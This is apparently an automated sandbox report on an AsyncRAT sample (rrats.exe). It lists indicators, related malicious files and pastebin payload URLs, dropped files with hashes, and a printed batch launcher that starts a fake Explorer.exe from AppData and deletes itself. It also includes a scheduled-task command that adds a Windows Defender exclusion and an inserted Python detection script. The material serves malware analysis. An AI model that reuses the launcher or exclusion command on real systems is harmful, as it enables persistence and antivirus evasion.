                                                            • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target Explorer.exe, PID 7412 because it is empty
                                                            • Execution Graph export aborted for target explore.exe, PID 7636 because it is empty
                                                             • Not all processes were analyzed; report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • VT rate limit hit for: rrats.exe
                                                             Time | Type | Description
                                                             08:11:55 | API Interceptor | 1x Sleep call for process: rrats.exe modified
                                                             08:11:58 | API Interceptor | 30x Sleep call for process: powershell.exe modified
                                                             08:12:10 | API Interceptor | 9885412x Sleep call for process: Explorer.exe modified
                                                             14:12:03 | Task Scheduler | Run new task: WindowsUpdater path: "C:\Users\user\AppData\Roaming\Explorer.exe"
                                                             14:12:09 | Task Scheduler | Run new task: WinUpdate path: C:\Users\user\AppData\Local\explore.exe
                                                             14:12:09 | Task Scheduler | Run new task: WinUpdaters path: cmd.exe s>/C powershell Add-MpPreference -ExclusionPath C:"
                                                             Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                             104.20.4.235 | gabe.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             104.20.4.235 | vF20HtY4a4.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             104.20.4.235 | OSLdZanXNc.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             104.20.4.235 | gaber.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             104.20.4.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
                                                             104.20.4.235 | sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
                                                             104.20.4.235 | envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
                                                             104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
                                                             172.67.19.24 | sys_upd.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | cr_asm_menu..ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | cr_asm2.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | cr_asm_phshop..ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | HQsitBLlOv.dll | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | xK44OOt7vD.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | steamcodegenerator.exe | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | pastebin.com/raw/sA04Mwk2
                                                             172.67.19.24 | BeginSync lnk.lnk | malicious | Unknown | pastebin.com/raw/sA04Mwk2
                                                             Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                             pastebin.com | Q8o0Mx52Fd.exe | malicious | Unknown | 104.20.3.235
                                                             pastebin.com | Q8o0Mx52Fd.exe | malicious | Unknown | 104.20.3.235
                                                             pastebin.com | Setup.exe | malicious | LummaC Stealer | 104.20.4.235
                                                             pastebin.com | Microsoft.doc | malicious | Unknown | 104.20.3.235
                                                             pastebin.com | a9YMw44iQq.exe | malicious | AsyncRAT, XWorm | 172.67.19.24
                                                             pastebin.com | nlGOh9K5X5.exe | malicious | Xmrig | 172.67.19.24
                                                             pastebin.com | cJ6xbAA5Rn.exe | malicious | Unknown | 172.67.19.24
                                                             pastebin.com | vortex.ps1 | malicious | AsyncRAT, PureLog Stealer | 104.20.3.235
                                                             pastebin.com | MicrosoftScript.ps1 | malicious | AsyncRAT, PureLog Stealer | 172.67.19.24
                                                             pastebin.com | msedge.exe | malicious | AsyncRAT, XWorm | 104.20.3.235
                                                             Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                             CLOUDFLARENETUS | https://newkr-projectx.glitch.me/#brian.ruane@phillyshipyard.com&c=E,1,vVA-mg8r52Zblu_rhig7GFt2mCpLF9PVkeDHz-A9beseyk-7hG6M7GtCamglxWILhEciDIA3yPk4yeJAXNdlExpv1QvST_9_UAM_sKTiUoTphPpfNtY,&typo=1 | malicious | HTMLPhisher | 104.21.26.223
                                                             CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
                                                             CLOUDFLARENETUS | https://app.droplet.io/form/yelEz0 | malicious | Unknown | 104.18.16.155
                                                             CLOUDFLARENETUS | https://verification.com/omid_error? | malicious | Unknown | 104.21.19.197
                                                             CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 104.21.16.9
                                                             CLOUDFLARENETUS | http://doctifyblog.com | malicious | Unknown | 172.67.136.51
                                                             CLOUDFLARENETUS | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 172.67.165.166
                                                             CLOUDFLARENETUS | https://www.egencia.com/conversations/cp/connect.html/?id=9445ace5-416d-4fb9-b151-bab0770ccdde | malicious | Unknown | 104.18.86.42
                                                             CLOUDFLARENETUS | file.exe | malicious | LummaC Stealer | 172.67.165.166
                                                             CLOUDFLARENETUS | https://www.steffe.nu/wp-content/plugins/wats/openfl.php?id=tIP6QK9Y1HOngi2nR2bt | malicious | Unknown | 172.67.199.212
                                                             IHOR-ASRU | http://comprehend-girls.ru/uk_razn_html | malicious | Porn Scam | 93.170.123.244
                                                             IHOR-ASRU | SecuriteInfo.com.Trojan.Encoder.3976.32157.17259.exe | malicious | Locky | 93.170.123.219
                                                             IHOR-ASRU | KKdMgqLFjC.msi | malicious | Matanbuchus | 194.67.193.73
                                                             IHOR-ASRU | fBcMVl6ns6.lnk | malicious | RHADAMANTHYS | 185.58.206.164
                                                             IHOR-ASRU | rpQF1aDIK4.lnk | malicious | RHADAMANTHYS | 185.58.206.164
                                                             IHOR-ASRU | test.ps1 | malicious | RHADAMANTHYS | 185.58.206.164
                                                             IHOR-ASRU | path.ps1 | malicious | DcRat | 185.58.206.164
                                                             IHOR-ASRU | 81zBpBAWwc.exe | malicious | RHADAMANTHYS | 185.58.206.164
                                                             IHOR-ASRU | useraccount.aspx.dll | malicious | Matanbuchus | 194.67.193.13
                                                             IHOR-ASRU | Document-21-41-00.js | malicious | Bazar Loader, BruteRatel, Latrodectus | 193.124.185.116
                                                             Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                             3b5074b1b5d032e5620f69f9f700ff0e | https://app.droplet.io/form/yelEz0 | malicious | Unknown | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | TeudA4phjN.exe | malicious | Quasar | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | List of required items pdf.vbs | malicious | GuLoader | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | List of required items and services pdf.vbs | malicious | GuLoader | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | PYsje7DgYO.exe | malicious | RHADAMANTHYS | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | EcjH6Dq36Y.exe | malicious | RHADAMANTHYS | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | 9QwZPBACyK.exe | malicious | Unknown | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | https://www.drvhub.net | malicious | Unknown | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | http://www.sbh.co.uk/ | malicious | HTMLPhisher, TechSupportScam | 172.67.19.24
                                                             3b5074b1b5d032e5620f69f9f700ff0e | jKDBppzWTb.exe | malicious | AgentTesla | 172.67.19.24
                                                            No context
                                                            Process:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.353683843266035
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                            Process:C:\Users\user\AppData\Local\explore.exe
                                                            File Type:CSV text
                                                            Category:dropped
                                                            Size (bytes):425
                                                            Entropy (8bit):5.353683843266035
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                            MD5:859802284B12C59DDBB85B0AC64C08F0
                                                            SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                            SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                            SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):522
                                                            Entropy (8bit):5.358731107079437
                                                            Encrypted:false
                                                            SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:ML9E4KlKDE4KhKiKhg84j
                                                            MD5:AE6AF1A0CB468ECBA64E2D77CB4517DB
                                                            SHA1:09BD6366ED569ADB79274BBAB0BBF09C8244FD97
                                                            SHA-256:3A917DCBC4952EA9A1135B379B56604B3B63198E540C653683D522445258B710
                                                            SHA-512:E578CD0D9BF43FD1BA737B9C44B70130462CE55B4F368E2E341BB94A3A3FFA47D4A9FE714EB86926620D1B4BE9FFF4582C219DF9ACC923C765650B13C5451500
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllulsp:NllUs
                                                            MD5:45652443D5379363EBB99F8A6B76BAAE
                                                            SHA1:E22A0950AC6456C4A19064AF7F2A857FE06D6E16
                                                            SHA-256:5C5AB7A3B8787F67226287DC84E128A96EBBF98A39D78D71EF00E3CFBAB44005
                                                            SHA-512:9829F8611F0C11964193F33631E5C3CEE870C3C61FAC9AFEA4A8592A4D77CC96CB6CB380F6559422A505BFD7154C1B40FB7924BDC7D88C0DD8FE6F68A2E2C2F9
                                                            Malicious:false
                                                            Preview:@...e...................................;............@..........
                                                            Process:C:\Users\user\Desktop\rrats.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):18
                                                            Entropy (8bit):3.725480556997868
                                                            Encrypted:false
                                                            SSDEEP:3:LjjdHUGR:79UGR
                                                            MD5:CC1BFA4D25DC0D101CFE0A22852E9F00
                                                            SHA1:51C0172AC90F74FA675D96F326C2DF8E85CC35FF
                                                            SHA-256:3276F0CE57358545885AA30B873FA4B604A94689B7528A174D8C9E819873FB08
                                                            SHA-512:D376D38607B12FFE2EDAFEDF4A0C1932C88FE9DB4E0A247D5104140D8DA311A3B752C0D9A52E6048E3247D13EFB3224218F56D276B22F2F26663E05334DE81EC
                                                            Malicious:false
                                                            Preview:start a.exe -p1234
                                                            Process:C:\Users\user\Desktop\rrats.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):308705
                                                            Entropy (8bit):6.919978105053525
                                                            Encrypted:false
                                                            SSDEEP:6144:S61E/QSnxoEMTlXEulocqX+tL7VMxVEosZzW:S6ErxJMTtEul2X+tLxMPEosg
                                                            MD5:7107F3FB53F9F3EAF3B95FD857F7AEE9
                                                            SHA1:81E0DFE67B3B098C331EB3964E670E7762749B40
                                                            SHA-256:3D74CBFD24A606B7F8C1E980CB08365C3127BED66B813F6FC7FB53EB19171CC0
                                                            SHA-512:CD42E3D36A1F0BF7F0429DF7EE0780D1D7039F0139F91E0CB71A488C8D50973DF53FE70A7CDB09E50E5651E2C1A7FEF3DA0A4CB1E9225C5071711BD2D9F2E5D8
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 17%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........NB. .. .. .S6... .S6..j. .S6.... .F.... .F.$... .F.#.. .F.%.. ..... ..... ..!.. ...%... ... .. ...... ...".. .Rich. .................PE..L..... b.................b.......... B............@.......................................@.........................0...4...d...P...............................x(......T...............................@...............,............................text....a.......b.................. ..`.rdata..............f..............@..@.data...`]...0......................@....didat..`...........................@....rsrc...............................@..@.reloc..x(.......*..................@..B........................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\a.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):67584
                                                            Entropy (8bit):5.599686577325716
                                                            Encrypted:false
                                                            SSDEEP:1536:6HDTgTiogco7Uk7u9LbMqDLuMYFYZR4v7vf+:6jTgTiogcq+LbM2CFc8m
                                                            MD5:3D91C31A52BE4E262F7F18272294ED99
                                                            SHA1:7C120A607650348FC4DFCDACDC77BF5885A9E6AC
                                                            SHA-256:B99B28B82C9DA1B009898DA323D4793DDE7828EFCF777A56A835D54CBFEC849D
                                                            SHA-512:D17CC9DB4D263ADDD524BAA7B67974B2D4F0B904F46367CD6138805CD65A8364EA700A9DF147DBB6DAC8B1E7288A87FE24C497E1B1825F49B576E101789856D1
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: Joe Security
                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe, Author: ditekSHen
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 82%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....xc................................. ... ....@.. .......................`............`.....................................W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........v...............s.................................................V..;...$0.xC.=VD..b......9A../.\.....{....*"..}....*..{....*"..}....*..{....*"..}....*J.(.....s....}....*2s6....o2...*2.{....o....*.s.........*..(....*.s.........*.(7...*.~....*.......*.~....*.......*.~....*.......*.~ ...*... ...*.~!...*...!...*.~"...*..."...*.~#...*...#...*.~$...*.~%...*...%...*.~&...*...&...*.~'...*...'...**.(B......*2~.....oC...*.s.....$...*jsq...%.oV...%.oW...oX...&*.(>...*.(b...
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX1\rrat.exe
                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):154
                                                            Entropy (8bit):5.0398316696236245
                                                            Encrypted:false
                                                            SSDEEP:3:mKDDCMNqTtvL5oUkh4EaKC54JBUbmqRDUkh4E2J5xAInTRIKSQjlI7ZPy:hWKqTtT69aZ5UUbmq1923fTrS2Sk
                                                            MD5:BCAA36EF13CD758D6ACA68C3FAE68A36
                                                            SHA1:1890F9E72463041E806111519DBA2D260C3405DA
                                                            SHA-256:E5DA7781104EE5250D657341A74870E28A3741DA0CC5CEB6C2D2998DB5E02807
                                                            SHA-512:B194B50675831BE984BA814ACCC6B081FE3A7B7B2B819195CE5193B8A3DEAD833CB7271E00DF07811FDEF354B91FB8F8531036336DE5ACFECA245D8BB4EB76C5
                                                            Malicious:false
                                                            Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\Explorer.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpE75F.tmp.bat" /f /q..
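The batch file previewed above is the hand-off between the dropper and the persisted copy: wait three seconds, start the payload that was written to the user's Roaming profile under the system name Explorer.exe, change into %TEMP% and delete a .bat. The script below is an added example (it is not part of the Joe Sandbox report) that tokenises such a launcher and flags the three traits a detection engineer would key on: a system-process name launched from a user-writable path, a launch from AppData, and a batch that removes a .bat after launching. The sample batch is reconstructed from the preview with CRLF line endings; the list of system process names and trusted directories is an illustrative assumption, not an authoritative list.

```python
import ntpath
import shlex
from typing import List

# Assumption for illustration: binary names that only belong under trusted system paths.
SYSTEM_PROCESS_NAMES = {
    "explorer.exe", "svchost.exe", "csrss.exe", "lsass.exe", "winlogon.exe",
    "services.exe", "dllhost.exe", "conhost.exe", "runtimebroker.exe",
}
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Constructed copy of the dropped batch (same commands as the preview above, CRLF terminated).
SAMPLE_BATCH = "\r\n".join([
    "@echo off",
    "timeout 3 > NUL",
    'START "" "C:\\Users\\user\\AppData\\Roaming\\Explorer.exe"',
    "CD C:\\Users\\user\\AppData\\Local\\Temp\\",
    'DEL "tmpE75F.tmp.bat" /f /q',
    "",
])


def _unquote(token: str) -> str:
    return token[1:-1] if len(token) >= 2 and token[0] == token[-1] == '"' else token


def start_target(tokens: List[str]) -> str:
    """Program launched by a START line: skip the optional quoted window title and any /switches."""
    for token in tokens[1:]:
        if token == '""' or token.startswith("/"):
            continue
        return _unquote(token)
    return ""


def analyze_launcher_batch(text: str) -> List[str]:
    """Names of the suspicious traits found, in file order; an empty list means nothing matched."""
    findings: List[str] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        tokens = shlex.split(line, posix=False)      # keep quotes and backslashes as cmd.exe sees them
        cmd = tokens[0].lower()
        if cmd == "timeout":
            findings.append("delayed_launch")
        elif cmd == "start":
            target = start_target(tokens)
            lowered = target.lower()
            name = ntpath.basename(lowered)
            if name in SYSTEM_PROCESS_NAMES and not lowered.startswith(TRUSTED_PREFIXES):
                findings.append("system_process_name_in_user_path")
            if "\\appdata\\" in lowered:
                findings.append("launch_from_appdata")
        elif cmd in ("del", "erase"):
            if any(_unquote(t).lower().endswith(".bat") for t in tokens[1:]):
                findings.append("deletes_batch_file")
    return findings


def is_suspicious_launcher(text: str) -> bool:
    """Verdict: a borrowed system name outside a trusted path plus a self-cleaning .bat."""
    found = set(analyze_launcher_batch(text))
    return "system_process_name_in_user_path" in found and "deletes_batch_file" in found


if __name__ == "__main__":
    for finding in analyze_launcher_batch(SAMPLE_BATCH):
        print(finding)
    print("suspicious:", is_suspicious_launcher(SAMPLE_BATCH))
```

The same logic applies to the batch text captured from Sysmon or EDR process-creation events (cmd.exe /c ...), where the START target and the DEL argument arrive on one command line instead of in a file.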
                                                            Process:C:\Users\user\AppData\Roaming\Explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):67584
                                                            Entropy (8bit):5.599686577325716
                                                            Encrypted:false
                                                            SSDEEP:1536:6HDTgTiogco7Uk7u9LbMqDLuMYFYZR4v7vf+:6jTgTiogcq+LbM2CFc8m
                                                            MD5:3D91C31A52BE4E262F7F18272294ED99
                                                            SHA1:7C120A607650348FC4DFCDACDC77BF5885A9E6AC
                                                            SHA-256:B99B28B82C9DA1B009898DA323D4793DDE7828EFCF777A56A835D54CBFEC849D
                                                            SHA-512:D17CC9DB4D263ADDD524BAA7B67974B2D4F0B904F46367CD6138805CD65A8364EA700A9DF147DBB6DAC8B1E7288A87FE24C497E1B1825F49B576E101789856D1
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\explore.exe, Author: Joe Security
